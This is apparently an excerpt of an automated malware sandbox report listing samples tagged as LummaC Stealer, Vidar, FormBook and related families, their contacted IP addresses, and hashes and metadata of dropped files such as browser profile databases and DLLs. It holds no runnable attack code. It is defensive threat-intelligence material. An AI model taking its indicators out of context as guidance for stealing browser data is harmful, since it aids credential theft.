                    RB_VAC_1.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • 188.114.96.3
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 188.114.96.3
                    ZAMOWIEN.EXE.exeGet hashmaliciousDBatLoader, FormBookBrowse
                    • 188.114.96.3
                    https://docsend.com/view/qqrrvyqndwsixgqgGet hashmaliciousPhisherBrowse
                    • 188.114.96.3
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    Remittance#26856.htmlGet hashmaliciousHTMLPhisherBrowse
                    • 188.114.96.3
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 188.114.96.3
                    51c64c77e60f3980eea90869b68c58a8PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    file.exeGet hashmaliciousVidarBrowse
                    • 37.27.34.12
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    Pd3mM82Bs6.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    QyvAWkfdLM.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    uBgwoHPWaf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    QJqJic3hex.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    HeYgs7bTvy.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 37.27.34.12
                    37f463bf4616ecd445d4a1937da06e19kam.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    las.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    upload.vbsGet hashmaliciousUnknownBrowse
                    • 104.102.42.29
                    PxuZ1WpCgf.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    2023-1392 Martin y Ruiz Recambio Surtekpdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    justiicante transferencia compra vvda-pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    Nondesistance.exeGet hashmaliciousFormBook, GuLoaderBrowse
                    • 104.102.42.29
                    Tenuto.exeGet hashmaliciousFormBook, GuLoader, LummaC StealerBrowse
                    • 104.102.42.29
                    file.exeGet hashmaliciousVidarBrowse
                    • 104.102.42.29
                    TEILll7BsZ.exeGet hashmaliciousLummaC, CryptOne, LummaC Stealer, SmokeLoader, VidarBrowse
                    • 104.102.42.29
                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    C:\ProgramData\FBGIDHCAAKEB\freebl3.dll
                      PxuZ1WpCgf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      file.exe | malicious | Vidar
                      TEILll7BsZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      Pd3mM82Bs6.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      QyvAWkfdLM.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      uBgwoHPWaf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      QJqJic3hex.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      HeYgs7bTvy.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                    C:\ProgramData\FBGIDHCAAKEB\mozglue.dll
                      PxuZ1WpCgf.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      file.exe | malicious | Vidar
                      TEILll7BsZ.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      Pd3mM82Bs6.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      QyvAWkfdLM.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      QJqJic3hex.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      HeYgs7bTvy.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                      3.exe | malicious | LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Reputation:high, very likely benign file
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8475592208333753
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
                                                            MD5:BE99679A2B018331EACD3A1B680E3757
                                                            SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
                                                            SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
                                                            SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):159744
                                                            Entropy (8bit):0.5394293526345721
                                                            Encrypted:false
                                                            SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                            MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                            SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                            SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                            SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.1373607036346451
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                            MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                            SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                            SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                            SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:ASCII text, with very long lines (1765), with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):9976
                                                            Entropy (8bit):5.499944288613473
                                                            Encrypted:false
                                                            SSDEEP:192:NzKneRdpYbBp6znmUzaX/6aRMKWPzDNBw8DK9mSl:Nz5eUmUtgmrwbw0
                                                            MD5:42594FD09C4DF3B174CF5D59B1CAB13A
                                                            SHA1:1B78FEB748C36A592C468A76BB60E98187D7BE4A
                                                            SHA-256:F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
                                                            SHA-512:E2430AB14ADF2EF1CC2CB1F96DEADAFB3598B803A5E7724FDDB68ACF015D7E052291626A3D100FED902731DBFD10A9AE3387581AD2867F64D0B27E8D51B9069F
                                                            Malicious:false
                                                            Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "38829aa4-f57e-4fd8-bfd3-d094d57ae30f");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696493966);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696493970);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):155648
                                                            Entropy (8bit):0.5407252242845243
                                                            Encrypted:false
                                                            SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                            MD5:7B955D976803304F2C0505431A0CF1CF
                                                            SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                            SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                            SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1209886597424439
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                            MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                            SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                            SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                            SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):98304
                                                            Entropy (8bit):0.08235737944063153
                                                            Encrypted:false
                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.017262956703125623
                                                            Encrypted:false
                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                            Category:dropped
                                                            Size (bytes):5242880
                                                            Entropy (8bit):0.03708713717387235
                                                            Encrypted:false
                                                            SSDEEP:192:58rJQaXoMXp0VW9FxW/Hy4XJwvnzfXfYf6zfTfN/0DApVJCI:58r54w0VW3xW/bXWzvACzbJ0DApVJ
                                                            MD5:85D6E1D7F82C11DAC40C95C06B7B5DC5
                                                            SHA1:96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD
                                                            SHA-256:D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
                                                            SHA-512:5DD2B75138EFB9588E14997D84C23C8225F9BFDCEA6A2A1D542AD2C6728484E7E578F06C4BA238853EAD9BE5F9A7CCCF7B2B49A0583FF93D67F072F2C5165B14
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):32768
                                                            Entropy (8bit):0.017262956703125623
                                                            Encrypted:false
                                                            SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                            MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                            SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                            SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                            SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):685392
                                                            Entropy (8bit):6.872871740790978
                                                            Encrypted:false
                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: PxuZ1WpCgf.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: TEILll7BsZ.exe, Detection: malicious
                                                            • Filename: Pd3mM82Bs6.exe, Detection: malicious
                                                            • Filename: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Detection: malicious
                                                            • Filename: QyvAWkfdLM.exe, Detection: malicious
                                                            • Filename: uBgwoHPWaf.exe, Detection: malicious
                                                            • Filename: QJqJic3hex.exe, Detection: malicious
                                                            • Filename: HeYgs7bTvy.exe, Detection: malicious
                                                            • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):608080
                                                            Entropy (8bit):6.833616094889818
                                                            Encrypted:false
                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: PxuZ1WpCgf.exe, Detection: malicious
                                                            • Filename: file.exe, Detection: malicious
                                                            • Filename: TEILll7BsZ.exe, Detection: malicious
                                                            • Filename: Pd3mM82Bs6.exe, Detection: malicious
                                                            • Filename: c3f3d7cea638c32610d85c9c1dfdcfe3cba3dad9e932257113f07ffcac34b280_dump.exe, Detection: malicious
                                                            • Filename: QyvAWkfdLM.exe, Detection: malicious
                                                            • Filename: QJqJic3hex.exe, Detection: malicious
                                                            • Filename: HeYgs7bTvy.exe, Detection: malicious
                                                            • Filename: 91713a00dd18d04d68a6b34ac3c20206f1bd38cfb72506ef32baadd380c3f993_dump.exe, Detection: malicious
                                                            • Filename: 3.exe, Detection: malicious
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):450024
                                                            Entropy (8bit):6.673992339875127
                                                            Encrypted:false
                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2046288
                                                            Entropy (8bit):6.787733948558952
                                                            Encrypted:false
                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):257872
                                                            Entropy (8bit):6.727482641240852
                                                            Encrypted:false
                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):80880
                                                            Entropy (8bit):6.920480786566406
                                                            Encrypted:false
                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):65536
                                                            Entropy (8bit):0.9898774483980706
                                                            Encrypted:false
                                                            SSDEEP:96:r7MAdVsZhqnFb7qnIfqBQXIDcQAc614cE2cw3VT+HbHg/8BRTf32rLOyKZzTvSEc:fBdVPUM0eeMZQjvPFBzuiF3Z24IO88s
                                                            MD5:786F63462E99D2BF3027FDBF4495F269
                                                            SHA1:34B52718B24DB9B0E1460150F7061B069B8A103D
                                                            SHA-256:DE4D918DE3DA1FB57AFD4DCA8357B0F4D92F7433BA69D2ECE16F09DEF89ED851
                                                            SHA-512:1D43AC807904FA36E8EDEF1276D8F4A492B5B16E05CBE387493DC583C662903A472C87D65C39B441D4D80303F4C48B7A727CBC15A6B13EA819F1E4295D3A0F38
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:Mini DuMP crash report, 15 streams, Mon May 27 13:24:12 2024, 0x1205a4 type
                                                            Category:dropped
                                                            Size (bytes):52808
                                                            Entropy (8bit):2.826690826202209
                                                            Encrypted:false
                                                            SSDEEP:384:3lW38Vr0B9TBcllisVbdo7oA6epJpjXlA:3lWo0B9TBcrbdM6Co
                                                            MD5:2E50EDEE7198D33D7A36C86808DA9FF2
                                                            SHA1:A922287D5961B13A065A6C4AE6DCFE97AAF1A25B
                                                            SHA-256:2CFE65C223CA8B53B4F95BA9CCE3AD95AF057ED7486CBB59C771A1F1CA841DE7
                                                            SHA-512:DEEFFE32663C027F241361C33478C532692BA5EE4222A03CFD2A4C11F6EBD9013097EDF26E6EF76AF7418E1E877F6E939A05A355FF8FA94F62B6A2BD3F33115D
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):8286
                                                            Entropy (8bit):3.694957211953432
                                                            Encrypted:false
                                                            SSDEEP:192:R6l7wVeJY66nv6YSfSUPgmffW2bpDp89bxlsfl+bm:R6lXJd6v6Y6SUPgmff3Ix+fZ
                                                            MD5:C8FDC58DE8E53FCBDE4EDB0D37AA8883
                                                            SHA1:30401CDFB22C4A31D0A0A292155C640C5FAE36EB
                                                            SHA-256:68D069DB4C002BB1B7B5DD0E99D46139E29D6BA4D7E358BA33A1C4D3ED0B9145
                                                            SHA-512:D49CCE966C2A0295AEF90E4D64083ECEE3BBE8F693C165309F416855907CDE012A39E442DFFD5052C338DCB361EDF20C33CCD23063F0F78C7058A96A785AA598
                                                            Malicious:false
                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4537
                                                            Entropy (8bit):4.433164723806008
                                                            Encrypted:false
                                                            SSDEEP:48:cvIwWl8zsVJg77aI9ncWpW8VYBYm8M4JjdFIu+q8KUYwTm2Bgd:uIjfvI75V7VtJkuAYwTJBgd
                                                            MD5:6C1B396C28BA364712EDC55A278F2A1A
                                                            SHA1:5F987F91D3E26E34EC785FF4BB0596C22A6D6A15
                                                            SHA-256:E985BFA270750223B10BBAA3A16F0EF131186C1D0A4373119800B05612C698D4
